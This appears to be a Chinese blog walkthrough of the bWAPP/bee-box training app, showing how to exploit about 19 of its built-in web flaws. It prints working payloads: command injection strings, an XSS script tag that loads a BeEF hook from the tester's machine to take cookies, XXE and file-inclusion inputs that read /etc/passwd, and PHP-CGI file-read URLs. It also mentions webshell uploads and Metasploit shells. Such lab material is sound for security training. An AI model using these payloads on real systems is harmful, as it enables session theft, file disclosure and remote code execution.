buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。
bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。
下载地址:
http://www.mmeit.be/bWAPP/ OR http://sourceforge.net/projects/bwapp/files/bee-box/
下载后解压用vmware打开,访问80端口,bwapp默认账号密码
bee/bug
官方声称内置了100多种漏洞,具体如下:
*/ Injection vulnerabilities like SQL, SSI, XML/XPath, JSON, LDAP, HTML, iFrame, OS Command and SMTP injection */ Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF) */ Unrestricted file uploads and backdoor files */ Authentication, authorization and session management issues */ Arbitrary file access and directory traversals */ Local and remote file inclusions (LFI/RFI) */ Server Side Request Forgery (SSRF) */ XML External Entity Attacks (XXE) */ Heartbleed vulnerability (OpenSSL) */ Shellshock vulnerability (CGI) */ Drupal SQL injection (Drupageddon) */ Configuration issues: Man-in-the-Middle, cross-domain policy file, information disclosures,... */ HTTP parameter pollution and HTTP response splitting */ Denial-of-Service (DoS) attacks */ HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues */ Unvalidated redirects and forwards */ Parameter tampering */ PHP-CGI vulnerability */ Insecure cryptographic storage */ AJAX and Web Services issues (JSON/XML/SOAP) */ Cookie and password reset poisoning */ Insecure FTP, SNMP and WebDAV configurations */ and much more...
下面是部分漏洞的测试方法:
1、HTML Injection – Reflected (GET)
输入:<a href=http://www.baidu.com>点这里</a>
2、iFrame Injection
修改ParamUrl参数如下图:
3、OS Command Injection
输入以下字符串:
www.nsa.gov;id
www.nsa.gov&&id
www.nsa.gov|id
4、PHP Code Injection
修改参数message为php代码:
5、SQL Injection (GET/Search)
直接sqlmap即可:
6、XML/XPath Injection (Login Form)
账号密码输入: a' or ''=' (此处被防Xss转义?需修改?)
7、Broken Auth. – Password Attacks
其他密码测试(ssh、ftp、snmp)
8、XSS – Reflected (GET)
输入:
<script>alert(/xss/)</script>
9、XSS – Stored (Blog)
输入:
<script src=http://192.168.245.136:3000/hook.js></script>
192.168.245.136是我的kali,已经启动了beef。
Beef上线,可获取cookie、执行js等:
10、Insecure WebDAV Configuration
直接put上传:
上传成功:
11、HTML5 Web Storage (Secret)
使用chrome,f12查看账号密码:
12、Heartbleed Vulnerability
登录https://192.168.245.142:8443/bWAPP/login.php bee/bug
通过漏洞抓取内存,直接获取刚刚登陆的账号密码:
13、Remote & Local File Inclusion (RFI/LFI)
修改参数:language=/etc/passwd
测试本地包含,修改参数:language=phpinfo.txt
测试远程包含,修改参数:language为远程shell的地址:
14、XML External Entity Attacks (XXE)
点击 any bugs?,抓包,修改POST数据为:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]> <reset> <login>&test;</login> <secret>login</secret> </reset>
15、PHP CGI Remote Code Execution
查看源代码 http://192.168.245.142/bWAPP/admin/?-s
读取文件:http://192.168.245.142/bWAPP/admin/?-dauto_prepend_file%3d/etc/passwd+-n
使用msf getshell:配置参数
GETSHELL:
16、Shellshock Vulnerability (CGI)
抓包,修改请求http://192.168.245.142/bWAPP/shellshock.sh的请求头:
17、Unvalidated Redirects & Forwards
点击beam,抓包修改参数url=http://www.baidu.com:
18、Unrestricted File Upload
浏览,上传shell:
19、WSDL FILE
访问:http://192.168.245.142/bWAPP/ws_soap.php?wsdl
使用wvs对web service扫描:
使用sqlmap测试: